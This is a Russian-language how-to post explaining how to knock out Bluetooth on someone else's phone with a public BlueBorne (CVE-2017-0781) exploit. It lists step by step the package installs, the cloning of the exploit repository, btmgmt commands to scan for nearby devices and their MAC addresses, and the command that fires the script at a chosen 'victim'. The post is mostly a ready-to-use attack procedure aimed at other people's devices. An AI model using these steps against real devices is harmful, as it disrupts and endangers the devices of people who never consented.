Как отключить Bluetooth на чужом девайсе.

Как отключить Bluetooth на чужом девайсе.


Доброго времени суток. Сегодня хотел бы рассказать вам об уязвимости, которая известно давно...Просто о ней на время забыли, т.к. не выкладывали exploit...И вот на днях совершилось чудо! На гитхабе выложили скрипт python-а с использованием уязвимости(CVE-2017-0781/ Blueborn). 

Суть exploit-а в том, что бы вызвать принуждённое отключение bluetooth на устройстве "жертвы". Грубо говоря, exploit бьёт по уязвимым местам прошивки android( как пишут некоторые люди, ios тоже через раз получается) и вызывает ошибку типа null-byte(переполнение буфера). 


UPD: Было лично протестировано на своём телефоне - MEIZU M5 NOTE с обновлённым Flyme OS. 


Приступим! 


>Первым делом нам нужно установить зависимости скрипта. 

[SRC] 

apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential 

[/SRC] 

Затем обновляем модули python. 

[SRC] 

pip install —upgrade pip 

pip install —upgrade pwntools 

[/SRC] 

Для работы с bluetooth с помощью python нам понадобится модуль pybluez. 

[SRC] 

apt-get install bluetooth libbluetooth-dev 

pip install pybluez 

[/SRC] 

>Затем приступаем к скачиванию эксплоита(корректней будет назвать скриптом). 

[SRC] 

git clone https://github.com/ojasookert/CVE-2017-0781


>Дальше нам придётся попотеть...Т.к. проблема может быть следующая: 

Не работает bluetooth....Для этого используем утиллиту btmgmt. 

Запускаем её и делаем следующие шаги: 


btmgmt —index 0 

power 

auto-power 

find 


Если начнется мониторинг Bluetooth устройств - значит всё готово. 

>Используем скрипт. Для этого нам нужен MAC-адресс bluetooth устройства(используем команду btmgmt —index 0 и find). 

Как только нашли "жертву", вводим команду. 

[SRC] 

python CVE-2017-0781.py TARGET=*mac-адресс с заглавными буквами.* 

[/SRC] 

И ждём. Мониторить устройство можете с других или же через консоль.